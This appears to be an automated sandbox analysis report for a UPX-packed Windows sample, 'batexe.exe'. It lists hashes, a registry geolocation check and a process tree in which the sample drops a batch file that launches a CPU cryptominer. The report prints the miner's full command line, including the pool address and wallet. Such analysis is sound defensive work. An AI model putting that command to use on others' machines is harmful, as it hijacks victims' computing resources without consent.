73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 17:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3588	b2e.exe
4212	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
4212	cpuminer-sse2.exe
4212	cpuminer-sse2.exe
4212	cpuminer-sse2.exe
4212	cpuminer-sse2.exe
4212	cpuminer-sse2.exe
4212	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4872-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4872 wrote to memory of 3588	4872	batexe.exe	83
PID 4872 wrote to memory of 3588	4872	batexe.exe	83
PID 4872 wrote to memory of 3588	4872	batexe.exe	83
PID 3588 wrote to memory of 1104	3588	b2e.exe	84
PID 3588 wrote to memory of 1104	3588	b2e.exe	84
PID 3588 wrote to memory of 1104	3588	b2e.exe	84
PID 1104 wrote to memory of 4212	1104	cmd.exe	87
PID 1104 wrote to memory of 4212	1104	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4872
- C:\Users\Admin\AppData\Local\Temp\66A4.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\66A4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\66A4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\72BA.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\66A4.tmp\b2e.exe

Filesize
5.8MB

MD5
3e1013b404e151ba6db0005cccb8c0a9

SHA1
391fd36ed9cf6d51faabae5ae796d497b222567b

SHA256
021a7a4bdaab52398a87cd5a0e332386ea2e0411a8fe00d777ef87b8f9cdd2ac

SHA512
27fb3f1c5530b91bb903c4768861f67220ad44a44224c8bc0cd0601f6873afcc94586514be4aeb5f8763c0ecbfa7b365a9f55eeccf0968df907c1d5a7b47bc59

Download Submit
C:\Users\Admin\AppData\Local\Temp\66A4.tmp\b2e.exe

Filesize
384KB

MD5
3c0bec088d86bb620c8b42308d6098b3

SHA1
f486f2b80f76da0966fb3ccbc33fb96a4f890835

SHA256
1dfda8d76528af8231198a0ad4cbb09b05155c5e35f565ca78f81db527841d07

SHA512
bc4a62dacaf7990d21cc1bc04412acdd80659371fb4205065e0e917885076be8615d766f6640683642603c1c0e551efde0236acb3d6a772dc1af263cb1627414

Download Submit
C:\Users\Admin\AppData\Local\Temp\66A4.tmp\b2e.exe

Filesize
192KB

MD5
6ac4b534a8945150025756c2f85dd2d4

SHA1
4f8633cd78b9248d5885e75ff1b26ef27a196ad1

SHA256
2e07e008a86c33e31905b1f49b18245261ad08ed3463c6750d63502e1e20e43d

SHA512
303f0cd104441235da58583af1597994df43d0a2d55d6245e89fc7d8f2509915525925277636214722e922f2939c93ba95627d54a18105d6cfa8e606b2f3c172

Download Submit
C:\Users\Admin\AppData\Local\Temp\72BA.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
486KB

MD5
2f4aaea3c86fc609d0f85b8a04bfc0d9

SHA1
c1913297d1725cbadb1ca5f7b7944b80ee22b592

SHA256
80194a39c6f9dd55180da67ef3c3e5cdfef978237b2d81ae9bd5a555d9ae765e

SHA512
74270af0252accb409ba7638ed3b3b6729f59603e5069fdee9d5cc668adc3760ee85bd373b18505aa3ef908e252d4d5a3438fc3d9afa767d2a65a13e189690d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
423KB

MD5
90dd4c2681cda0c50752dc1568e707c9

SHA1
1ccef58372f1d6b13008bfb0e29bf373941496e7

SHA256
d09024d31fc846380a23b8f6567cb447695be445147f3237d1f547ae5b2ce403

SHA512
31035cc8bbe1438d423624b2f2c40f2aba1051442328c8d44150e8518e28038bccfdeceada9d79eff2d2388aaaadeedb1fb1964aa5d5e1c93feebc287724bf5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
180KB

MD5
26b7ab3e2a2d4ae96f45a98f8d5d8fc5

SHA1
f052765d613623823c31e25aaad0c4c0a2f80f69

SHA256
dbd006b8ca03afa4207dfcc2ba2152c24797b8db59ec1c5375f8b602e0ee436b

SHA512
47875c4e4ff8c4436bd84535b49bac3cf99ced4cc6efbb8aa6ad40ec3d809ee487fd40ed8b1e7d8ffeeb0410987a14ea9ccac8c44fb092c4c234c6b81f212bf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
76KB

MD5
092e9b156aa6bcd1f77482f20e0adee3

SHA1
19c9cfaa735c4fa602741b0a15b876c4f1ad1e2c

SHA256
08eea0233eadd6674bb5454ccaccd39256f3aad5add72fa1ee86d5a396fc3233

SHA512
9bd7e8ff1157847f7e163f82f24beed2d40ad90e0c440a0533f9bada18b6aa5c48dfe02afeef422f058b42f889f03d81b236a5df04b43f8a75164043adb12bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
697KB

MD5
bc2b46bef02e94fcb4c350a53d4eb331

SHA1
7ad016f4c6585e9365efd27ad7e220b46aa36c06

SHA256
4fe4640649ebd326389297b69da1d5becfaf590646b7f047ddfcdcf0cc53c656

SHA512
9b045a68be03c3e22bf500546ff60c46cecfb97d7df0e35fdcb67b3318691a4976b77703b4890e2b40f9011a4bb44e7cda821777c44e4a8a163c29f3d53d9992

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
372KB

MD5
af583130378494cc1c0867f32bd7e416

SHA1
b0e39990ace21c3cb0d1867d2a11ce0b71c1af10

SHA256
f7d5fe1b7cb22099621333a7f88dcebc235a076a228323ac51049b7a4ce60241

SHA512
c3c0151a15ca79fe87579aa5a88e8eba5071808a056662399feb6202bc711837650ebd939f24989f3ad3b106cb1ae72d490d10027eab8d3d3e1bbb2511dd8e9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
224KB

MD5
d30df705acbe0a3965352ac662adfed3

SHA1
77b3167225fe52ad42c0590724f44fe2e7eb69b7

SHA256
fdb7f66a2c565534eb21118b4172aacf082eb185ed051384e31d3fae69910951

SHA512
cfc99d90232b11687257925a922eed2d1af7af68bde70c60960085dc71b2f8450b36d41b36a45d433f9077d640f775a57843c41a348465d9a0e4b7e0a43875d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
44KB

MD5
02f2ec72d4e847068a41d7a9b53abaf6

SHA1
60f67e900496610989864eed79c8c412a0bd0c4f

SHA256
f99b71c61aa1402f5a3c0a28d8d6571ddc68cc2a2b1445152ae4441b12f0f231

SHA512
11b70014122482004cf8c1ba8a96f613a5b9ad05704b1592a64072a45213c420c8c63838c429a9c99274ce745b21f2d7d93a420c1d5f271250570a2bda0f32e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
32KB

MD5
0e707594e0157a2a3bb3177ea75da530

SHA1
120aa54e5e80f58e0eaec100e12eb8b3f76a4683

SHA256
67e42faa9581e518eba9fc908df6eb47bc7122ddf57cec448ce51f6928e2677d

SHA512
7141df21c9361e84e9d860e95da879f86a0a8024b2ed7cc4b0c107b46a2508bfb08d10da88c3634b6bc1ec5bf67fedf6b825cee5d05a461988bf2a258aabd132

Download Submit
memory/3588-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3588-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4212-49-0x00000000744D0000-0x0000000074568000-memory.dmp

Filesize
608KB

Download
memory/4212-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/4212-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4212-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/4212-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/4212-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4212-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4872-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download